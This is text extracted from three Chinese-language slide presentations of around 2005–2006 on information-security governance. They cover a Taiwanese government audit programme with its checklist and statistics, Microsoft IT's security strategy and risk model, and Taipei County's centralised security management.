部<br />
組<br />
技<br />
術<br />
服<br />
研 務<br />
考 中<br />
會 心
行 政 院 國 家 資 通 安 全 會 報 組 織 架 構<br />
國 家 資 通 安 全<br />
諮 詢 委 員 會<br />
國 家 資 通 安 全 會 報<br />
總 召 集 人 : 副 院 長 兼 執 行 長 : 科 技 顧 問 組 執 行 秘 書 兼<br />
副 總 召 集 人 : 林 政 務 委 員 兼<br />
副 執 行 長 : 主 計 處 電 子 中 心 主 任 兼<br />
副 總 召 集 人 : 研 考 會 主 委 兼<br />
國 防 部 派 員 兼<br />
委 員 : 部 會 及 直 轄 市 副 首 長 兼 研 考 會 資 管 處 長 兼<br />
標 準 規 範 組<br />
( 經 濟 部 )<br />
稽 核 服 務 組<br />
( 主 計 處 )<br />
法 規 偵 防 組<br />
( 法 務 部 )<br />
資 訊 蒐 集<br />
分 析 組<br />
( 國 科 會 )<br />
通 報 應 變 組<br />
( 研 考 會 )<br />
綜 合 規 劃 組<br />
( 科 顧 組 )<br />
工 作 重 點<br />
資 安 稽 核 服 務 推 廣 與 訓 練<br />
‧ 現 場 深 度 訪 視 ‧ 稽 核 實 務 說 明 會<br />
‧ 稽 核 作 業 標 準 ‧ 主 管 稽 核 講 習<br />
‧ 稽 核 自 我 檢 視 ‧ 稽 核 / 非 稽 核 人 員 講 習<br />
‧ 資 安 風 險 評 估 ‧ 培 訓 稽 核 種 子 人 力<br />
‧ 電 話 / 線 上 諮 詢 ‧ 稽 核 作 業 研 討 會<br />
二 、 稽 核 目 的<br />
為 瞭 解 重 要 單 位 ( 含 公 民 營 機 構 ) 對 資 通 安 全<br />
重 視 及 因 應 情 形 , 透 過 外 部 稽 核 作 業 , 協 助 各<br />
單 位 加 強 落 實 各 項 安 全 防 護 措 施 , 並 及 早 發 現<br />
資 安 問 題 , 訂 定 因 應 策 略 及 預 防 措 施 , 以 降 低<br />
資 安 事 件 發 生 機 率 。<br />
6
三 、 稽 核 規 劃<br />
( 一 ) 籌 組 資 安 稽 核 服 務 團<br />
邀 請 國 防 部 、 交 通 部 、 經 濟 部 、 財 政<br />
部 、 國 科 會 、 工 研 院 、 資 策 會 、 電 信 研<br />
究 所 、 相 關 公 協 會 等 派 員 或 推 薦 學 者 、<br />
專 家 及 相 關 業 者 等 組 成 資 安 稽 核 服 務<br />
團 。<br />
7<br />
資 安 稽 核 服 務 團 成 員<br />
學 者 專 家 : 中 研 院 、 清 大 、 交 大 、 中 興 、 成<br />
大 、 警 大 、 台 科 大 、 東 海 、 逢 甲 、<br />
文 化 。<br />
業 界 代 表 : 趨 勢 科 技 、 賽 門 鐵 克 、 諮 安 科 技 、<br />
英 國 標 準 協 會 、 勤 業 會 計 師 、 致 遠<br />
會 計 師 、 安 侯 建 業 會 計 師 。<br />
政 府 機 關 : 國 防 部 、 研 考 會 、 國 科 會 、 國 家 資<br />
通 安 全 會 報 技 術 服 務 中 心<br />
8
( 二 ) 資 安 稽 核 範 圍 及 項 目<br />
依 據 「 行 政 院 及 所 屬 各 機 關 資 訊 安 全 管 理 要 點<br />
及 規 範 」、 參 考 國 際 及 國 內 資 訊 安 全 有 關 標 準<br />
如 ISO/IEC27001、BS7799-2:2005、CNS17800 等<br />
標 準 , 規 劃 設 計 資 通 安 全 稽 核 項 目 及 範 圍 , 計<br />
分 為 風 險 評 鑑 與 管 理 、 資 訊 安 全 政 策 、 資 訊 安<br />
全 組 織 、 資 產 管 理 、 人 力 資 源 安 全 、 實 體 與 環<br />
境 安 全 、 通 訊 與 作 業 管 理 、 存 取 控 制 、 資 訊 系<br />
統 取 得 , 開 發 及 維 護 、 資 訊 安 全 事 故 管 理 、 營<br />
運 持 續 管 理 及 遵 循 性 等 十 三 大 項 , 逐 項 進 行 稽<br />
核 。<br />
9<br />
( 三 ) 稽 核 進 行 程 序<br />
進 行<br />
查 核 前 的<br />
準 備 工 作<br />
在 受 查 單 位<br />
進 行<br />
查 核 前 會 議<br />
填 寫 外 部 稽 核 表<br />
彙 整 相 關 文 件 備 查<br />
稽 核 人 員 先 行 審 閱 資 料<br />
受 查 單 位<br />
提 供 資 料 與<br />
準 備 受 測 環 境<br />
對 每 一 分 項<br />
進 行 查 核<br />
查 核 意 見<br />
與<br />
受 查 單 位 說 明<br />
預 計 進 行 時 間 : 四 至 六 小 時<br />
查 核 後 會 議<br />
查 核 結 果 與<br />
意 見 交 換<br />
10
填 表 單 位 :<br />
資 通 安 全 外 部 稽 核 ( 自 我 評 審 ) 表<br />
查 核 項 目<br />
1 風 險 評 鑑 與 管 理 ( 資 訊 安 全 組 織 、 業 務 及 資 訊 單 位 )<br />
1.1 是 否 鑑 別 適 用 範 圍 內 之 所 有 資 訊 資 產 以 及 其 擁 有<br />
者 ?<br />
1.2 是 否 鑑 別 所 有 資 產 可 能 遭 遇 之 威 脅 ?<br />
1.3 是 否 鑑 別 所 有 資 產 可 能 之 脆 弱 點 ?<br />
1.4 是 否 鑑 別 資 產 可 能 因 威 脅 發 生 而 喪 失 機 密 性 、 完 整<br />
性 與 可 用 性 之 衝 擊 ?<br />
1.5 是 否 評 鑑 因 發 生 安 全 事 件 而 可 能 對 組 織 造 成 之 傷 害<br />
及 產 生 之 後 果 ?<br />
1.6 是 否 評 鑑 安 全 事 件 發 生 之 可 能 性 或 機 率 ?<br />
1.7 是 否 評 鑑 所 有 資 產 可 能 發 生 之 風 險 值 ?<br />
1.8 是 否 確 定 組 織 可 接 受 風 險 之 等 級 ?<br />
1.9 是 否 評 鑑 出 所 有 可 降 低 風 險 之 控 制 措 施 ?<br />
1.10 對 於 需 要 控 管 之 風 險 是 否 依 其 重 要 性 決 定 其 處 理<br />
之 優 先 順 序 ?<br />
1.11 是 否 制 定 風 險 處 理 計 畫 並 根 據 該 計 畫 導 入 控 制 措<br />
施 以 降 低 風 險 ?<br />
1.12 是 否 建 立 系 統 異 常 、 病 毒 及 入 侵 等 資 安 事 件 之 監 控<br />
機 制 ?<br />
1.13 是 否 有 書 面 的 風 險 評 鑑 報 告 ?<br />
1.14 是 否 有 訂 定 文 件 管 制 程 序 以 確 保 所 有 與 資 訊 安 全<br />
管 理 系 統 相 關 之 文 件 及 紀 錄 皆 受 到 適 當 之 保 護 與<br />
管 制 ?<br />
1.15 所 鑑 別 出 風 險 之 可 接 受 等 級 是 否 由 管 理 階 層 決<br />
定 ?<br />
填 表 日 期 : 年 月 日<br />
自 我 評 審 查 核 員 評 量<br />
是 否<br />
□<br />
□<br />
□<br />
□<br />
不<br />
適<br />
用<br />
完 整 性<br />
尚<br />
屬<br />
非<br />
常<br />
不<br />
盡<br />
不<br />
適<br />
用<br />
□ □ □ □ □ □ □<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□ □ □ □<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□<br />
□ □ □ □ □ □ □<br />
□ □ □ □ □ □ □<br />
□ □ □ □ □ □ □<br />
□ □ □ □ □ □ □<br />
□ □ □ □ □ □ □<br />
11<br />
四 、 資 通 安 全 整 體 準 備 情 形 統 計 表<br />
年 度 別<br />
非 常 完 整 (%)<br />
尚 屬 完 整 (%)<br />
不 盡 完 整 (%)<br />
90 年 度<br />
39%<br />
48%<br />
13%<br />
91 年 度<br />
34%<br />
52%<br />
14%<br />
92 年 度<br />
37%<br />
61%<br />
2%<br />
93 年 度<br />
57%<br />
43%<br />
0%<br />
94 年 度<br />
52%<br />
48%<br />
0%<br />
12
五 、 稽 核 檢 討<br />
( 一 ) 資 訊 安 全 政 策 : 審 查 與 評 估 。<br />
( 二 ) 實 體 與 環 境 安 全 : 財 產 攜 出 。<br />
( 三 ) 通 訊 與 作 業 管 理 : 可 攜 式 設 備 管 理 、 資 料 備<br />
份 、 日 常 日 誌 。<br />
( 四 ) 存 取 控 制 : 行 動 式 電 腦 作 業 與 遠 距 工 作 。<br />
( 五 ) 資 訊 系 統 取 得 、 開 發 及 維 護 : 變 更 管 制 、 木 馬 及 後 門<br />
程 式 檢 測 。<br />
( 六 ) 資 安 事 故 管 理 : 從 資 訊 安 全 事 故 中 學 習 。<br />
( 七 ) 營 運 持 續 管 理 : 業 務 衝 擊 分 析 、 計 畫 測 試 演 練<br />
與 維 護 、 教 育 訓 練 。<br />
( 八 ) 遵 循 性 : 系 統 稽 核 。<br />
13<br />
貳 、 資 安 內 部 稽 核 推 動 報 告<br />
一 、 緣 起<br />
‣ 稽 核 發 現 , 多 數 單 位 尚 未 辦 理 完 整 性 資 安 內<br />
部 稽 核 。<br />
‣ 依 據 「 行 政 院 及 所 屬 各 機 關 資 訊 安 全 管 理 要<br />
點 」 第 36 條 規 定 , 各 機 關 應 確 立 系 統 稽 核 項<br />
目 , 建 立 資 訊 稽 核 制 度 , 定 期 或 不 定 期 進 行<br />
資 訊 安 全 稽 核 作 業 。<br />
14
二 、 推 動 目 的<br />
‣ 協 助 機 關 檢 視 資 安 政 策 及 控 制 措 施 切 合 需 要<br />
且 具 體 有 效 。<br />
‣ 稽 核 結 果 做 為 機 關 資 安 政 策 檢 討 評 估 及 矯 正<br />
改 善 依 據 。<br />
‣ 為 加 強 各 機 關 建 立 資 安 稽 核 制 度 。<br />
‣ 加 強 員 工 落 實 執 行 資 安 規 定 。<br />
15<br />
三 、 推 動 策 略<br />
‣ 舉 辦 資 安 稽 核 訓 練 研 討 會 。<br />
‣ 設 計 資 安 稽 核 相 關 表 單 。<br />
‣ 選 定 主 管 機 關 及 重 要 資 訊 單 位 列 為 當 年 度 推<br />
動 執 行 單 位 。<br />
‣ 以 後 年 度 由 主 管 機 關 推 動 至 所 屬 單 位 , 全 面<br />
施 行 。<br />
16
四 、 結 果 說 明<br />
‣ 上 年 度 推 動 資 安 內 稽 單 位 含 政 府 部 門 及 民 間<br />
企 業 計 127 個 單 位 。<br />
‣ 25 個 單 位 已 通 過 資 安 認 證 。<br />
‣ 以 下 就 資 產 風 險 評 鑑 辦 理 情 形 、 稽 核 主 辦 單<br />
位 統 計 、 稽 核 結 果 統 計 、 綜 合 意 見 及 建 議 等<br />
分 別 報 告 。<br />
17<br />
資 產 風 險 評 鑑 辦 理 情 形<br />
未 辦 理<br />
25%<br />
已 完 成<br />
46%<br />
進 行 中<br />
29%<br />
已 完 成<br />
進 行 中<br />
未 辦 理<br />
18
資 安 內 稽 執 行 單 位 統 計<br />
其 他<br />
3%<br />
政 風 及 資 訊<br />
合 辦<br />
9%<br />
稽 核 小 組<br />
政 風 單 位<br />
資 訊 單 位<br />
其 他<br />
政 風 及 資 訊 合 辦<br />
資 訊 單 位<br />
25%<br />
政 風 單 位<br />
9%<br />
稽 核 小 組<br />
54%<br />
19<br />
資 通 安 全 準 備 情 形<br />
尚 待 加 強<br />
4%<br />
尚 未 辦 理<br />
0%<br />
非 常 完 整<br />
46%<br />
尚 屬 完 整<br />
50%<br />
非 常 完 整<br />
尚 屬 完 整<br />
尚 待 加 強<br />
尚 未 辦 理<br />
20
資 通 安 全 準 備 情 形 統 計 表 ( 依 項 目 別 )<br />
項 目<br />
非 常 完 整 尚 屬 完 整 不 盡 完 整 尚 未 辦 理<br />
家 數<br />
百 分<br />
比<br />
家 數<br />
百 分<br />
比<br />
家 數<br />
百 分<br />
比<br />
家 數<br />
百 分<br />
比<br />
資 訊 安 全 政 策 104 82% 12 9% 6 5% 5 4%<br />
資 訊 安 全 組 織 100 79% 17 13% 8 6% 2 2%<br />
人 員 安 全 管 理 98 77% 22 17% 5 4% 2 2%<br />
資 產 分 類<br />
與 控 制 84 66% 23 18% 12 9% 8 6%<br />
實 體 及 環 境<br />
安 全 管 理 102 80% 18 14% 6 5% 1 1%<br />
通 訊 與 作 業<br />
控 制 104 82% 19 15% 4 3% 0 0%<br />
存 取 控 制 97 76% 23 18% 5 4% 2 2%<br />
系 統 開 發<br />
與 維 護 97 76% 22 17% 4 3% 4 3%<br />
營 運 持 續 管 理 82 65% 19 15% 12 9% 14 11%<br />
符 合 性 99 78% 14 11% 9 7% 5 4%<br />
稽 核 意 見<br />
1) 文 件 與 記 錄 管 理 應 加 強 , 如 記 錄 表 單 增 設<br />
管 理 監 督 功 能 欄 位 及 處 理 時 間 記 錄 。<br />
2) 事 件 通 報 之 後 續 矯 正 改 善 措 施 , 應 建 立 追<br />
踪 管 制 機 制 。<br />
3) 備 援 機 制 及 備 份 資 料 , 應 定 期 進 行 實 際 演<br />
練 測 試 。<br />
4) 委 外 合 約 中 應 增 加 廠 商 資 安 工 作 需 求 及 對<br />
廠 商 實 施 資 安 責 任 稽 核 權 利 。<br />
22
稽 核 意 見<br />
5) 人 員 異 動 時 , 其 存 取 權 限 應 即 時 異 動 。<br />
6) 對 於 具 有 特 殊 權 限 之 使 用 者 , 應 定 期 稽 核 其<br />
使 用 情 況 。<br />
7) 對 於 委 外 廠 商 人 員 、 第 三 方 使 用 者 、 工 讀 生<br />
或 支 援 志 工 等 使 用 資 訊 人 員 , 應 作 風 險 評 估<br />
並 實 施 安 全 保 護 措 施 。<br />
8) 資 訊 資 產 安 全 等 級 應 列 入 資 產 清 冊 納 管 。<br />
23<br />
稽 核 意 見<br />
9) 可 攜 式 資 訊 設 備 或 私 人 資 訊 設 備 之 管 理 , 有<br />
待 加 強 ; 電 腦 設 備 報 廢 後 , 相 關 資 料 移 除 程<br />
序 宜 再 嚴 謹 。<br />
10) 資 安 稽 核 工 作 宜 列 入 年 度 計 畫 定 期 實 施 。<br />
24
結 語<br />
資 安 管 理 成 功 的 關 鍵 因 素<br />
一 、 管 理 階 層 實 際 的 支 持 與 承 諾<br />
二 、 正 確 的 風 險 評 鑑 與 有 效 的 控 制 措 施<br />
三 、 全 體 員 工 的 認 知 與 實 踐<br />
四 、 資 安 政 策 要 定 期 審 查 與 評 估<br />
五 、 不 定 期 的 稽 核<br />
25<br />
報 告 結 束<br />
敬 請 指 教<br />
26
組 織 改 造 資 訊 整 合 之 資 安 案<br />
例 探 討<br />
史 百 誠<br />
資 深 產 品 行 銷 經 理<br />
Server Platform Business<br />
Group<br />
台 灣 微 軟<br />
胡 士 亮<br />
平 台 架 構 技 術 副 理<br />
開 發 工 具 暨 平 台 推 廣 處<br />
台 灣 微 軟<br />
內 容 大 綱<br />
微 軟 IT 環 境 介 紹<br />
安 全 策 略<br />
使 命 與 願 景<br />
資 訊 安 全 原 則<br />
風 險 決 策 模 型<br />
戰 術 項 目<br />
企 業 風 險 與 解 決 方 案<br />
資 訊 安 全 組 織 架 構<br />
總 結<br />
2<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
Microsoft IT 環 境<br />
• 300,000+ PCs<br />
devices<br />
• 104,000+ e-mail e<br />
server accounts<br />
• Single<br />
Instance SAP<br />
(1.9Tb Db)<br />
Redmond<br />
Tukwila<br />
Silicon Valley<br />
• 89,000 end users<br />
• 83 countries<br />
Charlotte<br />
Dublin<br />
Singapore<br />
• 403<br />
buildings<br />
• 9.5M+ remote<br />
connections/month<br />
• 3M+ e-mail e<br />
messages per<br />
day internally<br />
• 99.99% availability<br />
3<br />
Microsoft 資 訊 安 全 概 況<br />
資 安 概 況<br />
每 月 10 萬 次 以 上 的 攻 擊 / 弱 點 掃 描<br />
每 天 超 過 100 萬 封 以 上 的 垃 圾 郵 件<br />
挑 戰<br />
企 業 文 化 允 許 個 人 自 理 與 最 大 使 用 彈 性<br />
大 量 的 行 動 裝 置<br />
(Notebook/PDA/Smartphone/Home)<br />
獨 特 的 IT 環 境 來 因 應 產 品 開 發 / 測 試 / 支 援<br />
的 特 殊 資 訊 安 全 需 求<br />
大 部 份 的 微 軟 員 工 對 資 訊 技 術 非 常 熟 悉 且<br />
常 常 追 求 軟 體 功 能 的 極 限 以 改 善 產 品 品 質<br />
4<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
微 軟 資 訊 安 全 策 略<br />
公 司 資 訊 安 全<br />
使 命 與 願 景<br />
資 訊 安 全 原 則<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
5<br />
公 司 資 訊 安 全<br />
使 命 與 願 景<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
評 估 風 險<br />
透 過 系 統 化 的 評 估 、 溝 通 並<br />
降 低 資 訊 資 產 風 險 以 避 免 惡<br />
意 或 未 授 權 的 使 用 造 成 微 軟<br />
智 慧 財 產 權 或 生 產 力 的 損 失<br />
稽 核<br />
定 義<br />
政 策<br />
監 控<br />
6<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
公 司 資 訊 安 全 願 景<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
IT 環 境 包 括 服 務 、 應 用 程 式 與 基 礎 架 構 來 提 供 高 可 用 性 、 隱 密<br />
與 安 全 的 服 務 給 所 有 用 戶<br />
主 要 客 戶 保 障 包 括<br />
我 的 身 分 不 會 被 冒 用<br />
資 源 是 安 全 而 且 可 用 的<br />
個 人 資 料 與 傳 輸 的 隱 私<br />
明 確 定 義 角 色 與 責 任<br />
即 時 的 回 應 風 險 與 威 脅<br />
7<br />
資 訊 安 全 原 則<br />
管 理 階 層 的 承 諾<br />
依 據 企 業 目 標 來 管 理 風 險<br />
定 義 組 織 角 色 與 責 任<br />
使 用 者 與 資 料<br />
使 用 最 低 權 限 原 則 管 理<br />
嚴 格 執 行 個 人 隱 私 與 個 人 識 别 訊 息 保 護<br />
應 用 程 式 與 系 統 開 發<br />
在 整 個 開 發 生 命 週 期 中 強 化 資 訊 安 全<br />
分 層 防 禦 並 降 低 被 攻 擊 面 積<br />
維 護 與 營 運<br />
資 訊 安 全 整 合 到 維 運 架 構 中<br />
監 控 、 稽 核 與 回 應<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
8<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
企 業 風 險 模 型<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
維 運 原 則<br />
戰 術 優 先 項 目<br />
High<br />
風 險 與 影 響<br />
(Defined by Business Owner)<br />
Acceptable Risk<br />
Unacceptable Risk<br />
Risk assessment drives<br />
to acceptable risk<br />
Low<br />
Low<br />
資 產 價 值<br />
(Defined by Corporate Security)<br />
High<br />
9<br />
依 據 資 產 類 型 進 行<br />
風 險 分 析<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
利 用 錯 誤 設 定 、 buffer<br />
overflows、 、 檔 案 共 享 、<br />
NetBIOS 進 行 攻 擊<br />
Host<br />
Application<br />
未 經 授 權 存 取 、 未 檢 查 的<br />
記 憶 體 操 作<br />
監 聽 網 路 傳 輸 、<br />
收 集 資 訊<br />
Network<br />
Assets<br />
Trust<br />
未 管 理 的 信 任 允 許<br />
Account<br />
危 害 帳 號 的 完 整 性 與 隱<br />
私<br />
10<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
風 險 評 估 的 組 成 元 件<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
Asset<br />
What are you<br />
trying to<br />
assess?<br />
Threat<br />
What are you<br />
afraid of<br />
happening?<br />
Vulnerability<br />
How could the<br />
threat occur?<br />
Mitigation<br />
What is<br />
currently<br />
reducing the<br />
risk?<br />
Impact<br />
What is the<br />
impact to the<br />
business?<br />
+<br />
Probability<br />
How likely is the<br />
threat given<br />
the controls?<br />
=<br />
Current Level<br />
of Risk<br />
What is the probability that the threat will<br />
overcome controls to successfully exploit the<br />
vulnerability and impact the asset?<br />
11<br />
風 險 管 理 程 序 項 目<br />
與 組 織 架 構<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
Corporate Security<br />
Group<br />
Prioritize<br />
Risks<br />
1<br />
Security<br />
Policy<br />
2 5<br />
Compliance<br />
Engineering<br />
& Operations<br />
Security<br />
Sustained<br />
Solutions &<br />
Operations<br />
Initiatives<br />
3 4<br />
12<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
依 據 環 境 排 定 優 先 順 序<br />
使 命 與 願 景<br />
風 險 決 策 模 型<br />
戰 術 優 先 項 目<br />
維 運 原 則<br />
排 序 後 風 險<br />
Data Center<br />
用 戶 端<br />
不 受 管 理 用 戶<br />
端<br />
RAS<br />
Mobile<br />
針 對 各 個 環 境 訂 定 政<br />
策 與 風 險 緩 和 措 施<br />
13<br />
企 業 風 險 與 解 決 方 案<br />
企 業 風 險<br />
解 決 方 案<br />
未 更 新 的 裝 置<br />
軟 體 更 新 與 管 理<br />
不 受 管 理 的 裝 置<br />
遠 端 與 移 動 使 用 者<br />
Embody<br />
Trustworthy<br />
Computing<br />
使 用 IPSec/802.1X 隔 離 網 路<br />
驗 證 遠 端 使 用 者<br />
Single-factor<br />
驗 證<br />
RAS 與 administrators 使 用<br />
2-factor<br />
驗 證<br />
保 護 重 要 資 產<br />
程 式 碼 保 護 計 畫<br />
14<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
資 訊 安 全 技 術 方 向<br />
主 動 式 基 礎 架 構 風 險 管 理 透 過 :<br />
Controlled<br />
Access<br />
Interior<br />
Hardening<br />
Secure<br />
Key Assets<br />
Compliance<br />
Monitoring<br />
• Automated IdAM<br />
• Patch Management<br />
• Secure Source<br />
• Elevated Access<br />
• Anti-virus/Anti<br />
virus/Anti-<br />
Code Assets<br />
Control<br />
spyware<br />
• Group Policy Objects<br />
• Application<br />
• 2-Factor Auth for<br />
Remote Access<br />
Software Assurance<br />
Program<br />
• PKI and Certs<br />
• IPSec<br />
• Secure Remote User<br />
• Messaging Firewall<br />
• Secure Wireless<br />
• Internal Controls<br />
Testing<br />
• Attack and<br />
Penetration<br />
Testing<br />
• Application<br />
Reviews<br />
15<br />
Compliance Competency<br />
Pyramid<br />
Manage<br />
Enforce<br />
Assess State<br />
Create Policy<br />
Assess Risk<br />
Enumerate<br />
Drive system configuration<br />
Remove from network/force patch<br />
Check configuration vs. policy<br />
Define expected behavior<br />
Identify threats, quantify, qualify<br />
Identify network environment<br />
Executive Sponsorship<br />
Security is a business priority<br />
16<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
不 僅 僅 是 技 術 而 以 …<br />
人 員 和 程 序 讓 資 訊 安 全 得 以 確 保<br />
資 訊 安 全 治 理<br />
事 業 單 位 權 責 劃 分<br />
能 見 度 與 管 理 數 據<br />
高 層 背 書<br />
原 則 與 標 準 作 業 程 序<br />
宣 導 與 教 育<br />
17<br />
IT 資 訊 安 全 組 織<br />
資 訊 安 全 小 組<br />
Threat, Risk<br />
Analysis, and<br />
Policy<br />
Assessment<br />
compliance<br />
Monitoring,<br />
intrusion detection,<br />
incident response<br />
Shared services<br />
operations<br />
Threat & risk<br />
analysis<br />
Security<br />
management<br />
Monitoring &<br />
intrusion detection<br />
Physical &<br />
remote access<br />
Policy<br />
development<br />
Security<br />
assessment<br />
Rapid response<br />
& resolution<br />
Certificate<br />
administration<br />
Product<br />
evaluation<br />
Compliance &<br />
remediation<br />
Forensics<br />
Security<br />
tools<br />
Design<br />
review<br />
IT<br />
investigations<br />
Initiative<br />
management<br />
Structure<br />
standards<br />
18<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
總 結<br />
高 資 訊 安 全 在 一 個 開 放 的 環 境 內 是 可 以 做<br />
到 的<br />
我 們 依 靠 微 軟 核 心 技 術 來 強 化 資 訊 安 全<br />
強 化 資 安 政 策 遵 循 監 控 與 程 序<br />
是 人 讓 以 上 這 些 項 目 能 夠 發 生<br />
19<br />
IT Showcase:<br />
微 軟 如 何 進 行 IT 管 理<br />
Microsoft IT 部 門 實 務 經 驗 分 享<br />
外 部 網 站<br />
…TechNet<br />
內 容 http://www.microsoft.com/technet<br />
technet/<br />
itshowcase/<br />
Webcasts http://www.microsoft.com/technet<br />
technet/<br />
itsolutions/msit/webcasts.mspx<br />
…Microsoft Services<br />
http://www.microsoft.com/itshowcase<br />
itshowcase/<br />
20<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
© 2006 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.<br />
21<br />
© 2005 Microsoft Corporation. All rights reserved.<br />
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
規 劃 集 中 型 資 安 環 境<br />
經 驗 分 享<br />
以 台 北 縣 政 府 為 例<br />
報 告 人 : 台 北 縣 政 府 資 訊 中 心<br />
謝 翠 娟<br />
95.04.14<br />
Outline<br />
‧ 挑 戰<br />
‧ 策 略<br />
‧ 作 法<br />
‧ 討 論<br />
e 化 , 使 資 安 的 重 要 性 快 速 躍 升<br />
1
挑 戰<br />
‧ 資 源 、 人 力 有 限<br />
‧ 新 聞 焦 點 事 件<br />
– 中 毒<br />
– 替 代 役<br />
– 工 程 師<br />
‧24H 都 有 客 戶 上 門 ..<br />
‧ 需 求 多 樣 ..<br />
e 化 門 市 vs. 24h 門 庭 若 市<br />
網 站 逾 3 萬 人 次 到 訪<br />
挑<br />
戰<br />
2
服 務 不 打 烊<br />
縣 府 的 7-11<br />
門 市<br />
提 供 590 項 線 上 服 務 項 目 (390<br />
項 線 上 申 辦 、 59 項 線 上 繳 費 )<br />
挑<br />
戰<br />
BACK<br />
行 政 機 關 : 多 + 廣<br />
挑<br />
戰<br />
機 關 學 校 計 482 個<br />
↑: 縣 府 各 單 位<br />
☆: 鄉 鎮 市 公 所<br />
●: 其 他 相 關 機 關<br />
▲: 學 校<br />
3
資 訊 管 理 策 略<br />
策<br />
略<br />
資 安<br />
管 控<br />
不 中 斷<br />
運 作<br />
教 育<br />
訓 練<br />
集 中 管 理 、 統 籌 發 展<br />
客 戶<br />
服 務<br />
主 機<br />
集 中<br />
網 路<br />
集 中<br />
系 統<br />
集 中<br />
資 安 策 略 作 法<br />
資 產 及 上 網 管 制<br />
策<br />
略<br />
系 統 單 一 登 入<br />
門 禁 一 卡 多 用<br />
全 縣 及 附 屬 機 關 納 入<br />
VPN 網 路<br />
人 事 系 統 整 合 差 勤 系 統<br />
防 毒 集 中 監 控<br />
.. 管 理 資 訊 共 同 平 台<br />
4
資 安 作 法<br />
1. 資 通 安 全 政 策<br />
2. 資 通 安 全 組 織<br />
3. 資 產 分 類 及 控 制<br />
4. 人 員 安 5. 實 體 環 6. 通 訊 作<br />
全 管 理 境 安 全 業 管 理<br />
8. 存 取 控 制<br />
9. 業 務 永 續 運 作 管 理<br />
10. 符 合 性<br />
7. 系 統<br />
開 發 維<br />
護<br />
1. 資 通 安 全 政 策<br />
作<br />
法<br />
目 標<br />
1. 確 保 電 子 化 資 料 之 機 密<br />
性 , 防 止 非 法 使 用<br />
2. 確 保 資 訊 系 統 之 完 整 性<br />
及 可 用 性 。<br />
3. 確 保 資 訊 業 務 永 續 運<br />
作 。<br />
範 圍<br />
1. 資 產 管 理<br />
2. 人 員 管 理<br />
3. 硬 體 管 理<br />
4. 軟 體 管 理<br />
5. 永 續 運 作<br />
6. 資 安 稽 核<br />
5
2. 資 通 安 全 組 織<br />
作<br />
法<br />
‧ 跨 局 室 「 資 訊 安 全 管 理 會 報 」<br />
‧ 副 縣 長 擔 任 召 集 人<br />
‧ 成 員 - 本 府 各 局 室 主 管<br />
‧ 稽 核 工 作 - 政 風 室<br />
‧ 幕 僚 工 作 - 本 府 資 訊 中 心<br />
作<br />
法<br />
3. 資 產 分 類 、 管 理<br />
─ 資 產 管 理 及 上 網 檢 核<br />
Agent<br />
自 動 回 報<br />
軟 硬 體<br />
個 人 電 腦 軟 硬 體<br />
資 源 管 理 系 統<br />
機 台<br />
資 訊<br />
( 設 備 編 號 )<br />
財 產 資 訊<br />
設 備<br />
( 機 關 代 碼 +<br />
財 產 編 號 )<br />
財 產 、 組<br />
織 、 人 員<br />
異 動<br />
財 產 系 統<br />
網 路 安 全<br />
監 控 系 統<br />
使 用 網 路<br />
電 腦<br />
關 聯<br />
使 用 者<br />
資 訊 與 權 限<br />
NDS<br />
92-94 年 租 賃 資 料<br />
6
4. 人 員 安 全 與 管 理<br />
作<br />
法<br />
人 員 管 理<br />
1. 保 密 切 結<br />
2. 權 限 角 色<br />
帳 號 管 理<br />
1. 單 一 登 入<br />
2. 整 合 HR<br />
教 育 訓 練<br />
1. 使 用 者<br />
2. 管 理 者<br />
4.1. 單 一 登 入 系 統<br />
外 部 網 路<br />
DMZ<br />
內 部 網 路<br />
NDS 認 證<br />
民 眾 / 公 務 員<br />
Cache<br />
ACL<br />
Portal<br />
‧ 在 家 辦 公<br />
iChain<br />
